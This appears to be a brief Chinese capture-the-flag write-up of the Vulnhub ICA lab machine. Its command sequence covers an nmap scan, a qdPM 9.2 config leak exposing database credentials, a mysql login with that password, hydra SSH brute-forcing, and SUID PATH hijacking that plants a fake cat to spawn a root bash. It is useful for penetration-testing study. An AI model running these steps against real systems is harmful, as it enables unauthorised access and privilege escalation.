kali：192.168.111.111

靶机：192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

访问目标80，发现目标CMS为qdPM 9.2

搜索对应漏洞发现存在信息泄露

searchsploit qdpm

访问192.168.111.130/core/config/databases.yml得到目标数据库账号密码

利用数据库中的账号密码爆破ssh

mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h192.168.111.130

hydra -L ./user.txt -P ./pass.txt 192.168.111.130 -s 22 ssh -t 64

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

该程序执行的时候同时会执行cat命令

strings /opt/get_access

修改环境变量提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/cat
chmod 777 /tmp/cat
export PATH=/tmp:$PATH
./get_access
/tmp/bash -p

本栏目推荐文章
• vulnhub-DC-6
• vulnhub靶场渗透学习
• vulnhub-DC-5
• Lab 1-Vulnhub - Kioptix Level 1
• vulnhub-symfonos
• Vulnhub-Vulnos:2-WP
• Vulnhub-EVM-WP
• vulnhub-DC-4
• vulnhub Me and My Girlfriend靶场
• vulnhub DC-2靶场

靶机 Vulnhub ICA靶机vulnhub ica 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub 靶机lunchbreaker过程vulnhub 靶机inclusiveness过程vulnhub